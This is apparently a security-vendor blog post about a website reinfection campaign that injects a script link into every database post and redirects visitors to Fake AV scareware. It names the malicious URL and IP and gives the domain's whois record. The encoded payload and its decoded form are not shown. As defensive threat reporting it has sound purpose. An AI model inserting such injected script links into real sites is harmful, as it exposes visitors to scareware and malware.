Today, we started to detect that a large number of those sites are being reinfected (and a bunch of new ones are getting hacked too) with a very similar malware string. The major difference is this time the links are pointing to http://lessthenaminutehandle.com/js.php?kk=33 (both hosted at 18.104.22.168).
This hack also injects the malware on every post in the database, but this time encoded as:
Which decodes to:
Unfortunately, the domain being used is not blacklisted by Google (or any AV), so the risk is high for every site visitor… If you want to verify your site to ensure it hasn’t been infected, you can scan it here: Sucuri SiteCheck
What happens when someone clicks an infected site?
They are redirected to one of following sites where the infamous Fake AV is pushed to the user…
Here is the whois for the group responsible for that domain (not Hilary Kneber this time, but since they are using the same IP addresses and intermediary hosts, we assume it is all the same):
Jannet Degree firstname.lastname@example.org
+154654645234 fax: +154654645234
Jose Road 78
SanHose NA 64567
We will post more details as we learn more about it.
If your site is infected with malware and you need help, visit Sucuri, we’ll get you cleaned up.